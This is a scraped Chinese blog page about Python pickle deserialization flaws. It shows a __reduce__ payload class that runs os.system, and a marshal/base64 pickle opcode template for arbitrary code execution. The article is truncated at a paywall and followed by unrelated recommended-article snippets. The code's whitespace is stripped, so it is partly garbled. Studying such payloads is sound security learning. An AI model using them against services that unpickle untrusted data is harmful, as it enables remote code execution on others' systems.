python marshal loads failed_python pickle命令执行与marshal 任意代码执行

最新推荐文章于 2024-04-27 00:18:59 发布
最新推荐文章于 2024-04-27 00:18:59 发布
阅读量340 收藏
点赞数
文章标签: python marshal loads failed
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42417004/article/details/113638759
版权

1.python pickle反序列化漏洞

自己的理解:

由于在类的__reduce__方法中提供了我们可以自定义程序如何去解序列化的方法,因此如果应用程序接受了不可信任的序列化的数据,那么就可能导致安全问题。

importpickleimportosclassgen(object):def __reduce__(self):

s= """dir"""

returnos.system, (s,)

p=gen()

payload=pickle.dumps(p)

with open('payload.pkl', 'wb') as f:

f.write(payload)

以上这段代码中,要调用os模块的system函数来执行dir命令,其中reduce函数中的返回值中需要定义的有要调用的函数,需要传给函数的参数(以元组的形式给出);

接着只需要将该对象实例化后再序列化即可

importpickle

'''

some code

'''

pickle.load(open('./payload.pkl'))

'''

some code

'''

假设以上这段代码是服务器端处理反序列数据的时候的操作,其中没有将要调用的对象函数进行过滤,而是直接进行解序列化,导致代码执行 os.system("dir") 。

2.pickle任意代码执行

importmarshalimportbase64deffoo():pass #Your code here

print """ctypes

FunctionType

(cmarshal

loads

(cbase64

b64decode

(S'%s'

tRtRc__builtin__

globals

(tRS''

tR(tR.""" % base64.b64encode(marshal.dumps(foo.func_code))

我们只需要在foo函数中写上需要执行的代码即可。

code_str =base64.b64decode(code_enc)

code=marshal.loads(code_str)

func= types.FunctionType(code, globals(), '')

func()

执行以上函数便可以触发任意代码执行漏洞

from __future__ importunicode_literalsfrom flask importFlask, request, make_response, redirect, url_for, sessionfrom flask importrender_template, flash, redirect, url_for, requestfrom werkzeug.security

最低0.47元/天 解锁文章
weixin_42417004
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python marshal loads failed_在Pythonmarshal对象序列化的相关知识
weixin_29453497的博客
02-02 678
有时候,要把内存中的一个对象持久化保存到磁盘上,或者序列化成二进制流通过网络发送到远程主机上。Python中有很多模块提供了序列化与反序列化的功能,如:marshal, pickle, cPickle等等。今天就讲讲marshal模块。注意: marshal并不是一个通用的模块,在某些时候它是一个不被推荐使用的模块,因为使用marshal序列化的二进制数据格式还没有文档化,在不同版本的Python...
python marshal loads failed_pythonMarshal反序列化 – 不安全
weixin_35050881的博客
03-01 619
我在一个项目中工作,我使用cPickle快速加载文件.几天前我读到,元帅甚至可能比cPickle更快.它对我有用,但我很好奇,the documentation的这个警告是关于:WarningThe marshal module is not intended to be secure against erroneous or maliciously constructed data. Never...
Python marshal模块 主要函数 marshal.dump(object, file) Marshal.dumps(object) Marshal.load——《跟老吕学Python编程》
最新发布
Python老吕的博客
04-27 828
是一个强大的工具,用于在Python中处理二进制数据。通过了解它的功能和限制,你可以更有效地使用它来序列化和反序列化Python对象。然而,由于它的限制,如果你需要处理更复杂的对象或需要在不同的Python版本或平台上交换数据,你可能需要考虑使用其他序列化模块,如pickle或json。👨‍💻博主Python老吕评论,您的举手之劳将对我提供了无限的写作动力!🤞🔥《跟老吕学Python编程》《Python游戏开发实战讲解》《Python Web开发实战》《Python网络爬虫实战》
python marshal loads failed_python使用marshal模块序列化实例
weixin_35823403的博客
02-09 928
本文实例讲述了python使用marshal模块序列化的方法,分享给大家供大家参考。具体方法如下:先来看看下面这段代码:?12345678910111213141516171819202122232425262728 import marshal data1 = ['abc',12,23,'jb51'] #几个测试数据 data2 = {1:'aaa',b:'dad'} data3 = (1,2,...
python marshal loads failed_PyArmor简单使用
weixin_34662807的博客
03-01 3106
PyArmor 是一个用于加密和保护 Python 脚本的工具。它能够在运行时刻保护 Python脚本的二进制代码不被泄露,设置加密后 Python代码的有效期限,绑 定加密后的Python代码到硬盘、网卡等硬件设备。安装 PyArmor可以直接从这里 PyPi 下载, 但是更方便的方式是通过 pip ,直接 运行下面的命令进行安装:pip install pyarmor需要升级的话,执行下...
python pickle命令执行marshal 任意代码执行
weixin_30462049的博客
08-02 302
1.python pickle反序列化漏洞 自己的理解:   由于在类的__reduce__方法中提供了我们可以自定义程序如何去解序列化的方法,因此如果应用程序接受了不可信任的序列化的数据,那么就可能导致安全问题。 import pickle import os class gen(object): def __reduce__(self): s = ""...
python使用marshal模块序列化实例
12-25
本文实例讲述了python使用marshal模块序列化的方法,分享给大家供大家参考。具体方法如下: 先来看看下面这段代码: import marshal data1 = ['abc',12,23,'jb51'] #几个测试数据 data2 = {1:'aaa',"b":'dad'} data...
Pythonmarshal对象序列化的相关知识
01-20
Python中有很多模块提供了序列化与反序列化的功能,如:marshal, pickle, cPickle等等。今天就讲讲marshal模块。 注意: marshal并不是一个通用的模块,在某些时候它是一个不被推荐使用的模块,因为使用marshal序列...
详解Python中的序列化与反序列化的使用
01-20
还好,python标准库提供了功能更加强大且更加安全的pickle和cPickle模块。 cPickle模块是使用C语言实现的,所以在运行效率上比pickle要高。但是cPickle模块中定义的类型不能被继承(其实大多数时候,我们不需要从...
strazegy-marshal.rar_The Network
07-14
"strazegy-marshal.rar_The Network" 提供了一系列与神经网络控制相关的代码示例,是学习和研究神经网络控制策略的重要资源。以下是对这些文件的详细解读: 1. **tareadme.fst**:通常这是一个项目或软件的说明文件...
提醒!Pythonpickle 模块可能导致命令执行
somenzz的博客
05-14 271
你好,我是征哥,提到 Pythonpickle 模块,我经常用它保存运行时的对象,以便重启程序后可以恢复到之前的状态。今天发现了它在恢复 Python 对象时存在远程命令执行的安全问题,所以后面如果你的数据来自用户输入,那最好不用 pickle,用 json,官方文档也有警告和建议:接下来来看一下它是如何导致命令执行的。Pythonpickle 可以很方便的把...
【DL】——code = marshal.loads(raw_code) ValueError: bad marshal data (unknown type code)
怡宝2号
07-01 1492
Keras, 模型载入 code from keras.models import model_from_json import layers_builder as layers from keras.utils.generic_utils import CustomObjectScope path = "/home/darknet/CM/23_SLAM/Semantic_SLAM/Third_Part/PSPNet_Keras_tensorflow/weights/keras/pspnet101_c.
pythonmarshal --- 内部 Python 对象序列化
点点关注不迷路
03-07 247
pythonmarshal --- 内部 Python 对象序列化
Python标准库中的marshal模块
李世铭的博客
04-03 8081
 marshal-内部的Python对象序列化         该模块包含可以以二进制格式读取和写入Python值的函数。该格式是针对Python的,但独立于机器架构问题(例如,您可以将Python值写入PC上的文件,将文件传输到Sun,并在那里读取它)。使用marshal序列化的二进制数据格式还没有文档化,它可能会在Python版本之间发生变化(尽管很少发生)。        
runtimeerror什么原因_runtime error 解决方法
热门推荐
weixin_39653481的博客
11-24 5万+
1:第一步键盘上同时按“win+R”键打开运行,在运行输入框中输入“regedit”,如下图所示。点击确定2:进去注册表之后,找到“HKEY_LOCAL_MACHINE/SOFTWARE/microsoft/Windows/CurrentVersion/Run”3:点击“Run”之后,在右侧中找到“runtime”的错误信息,然后将它删除就完成了,不会对电脑系统有影响4:也可以按“Ctrl+F”键...
一文了解Python常见的序列化操作
Python热爱者的博客
11-03 543
1.marshal marshal使用的是与Python语言相关但与机器无关的二进制来读写Python对象的。这种二进制的格式也跟Python语言的版本相关,marshal序列化的格式对不同的版本的Python是不兼容的。 marshal一般用于Python内部对象的序列化。 一般地包括: 基本类型 booleans, integers,floating point numbers,complex numbers 序列集合类型 strings, bytes, bytearray, tuple, list,
p83 CTF夺旗 Python考点SST&反序列化&字符串
weixin_43263566的博客
03-24 1128
CTF夺旗 Python考点SST&反序列化&字符串
浅谈Python Pickle反序列化
YJ_12340的博客
11-11 777
序列化说白了就是将对象转换成字节流,便于保存在内存、文件或者是数据库中;反序列化则是序列化的逆过程,将字节流还原成对象。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值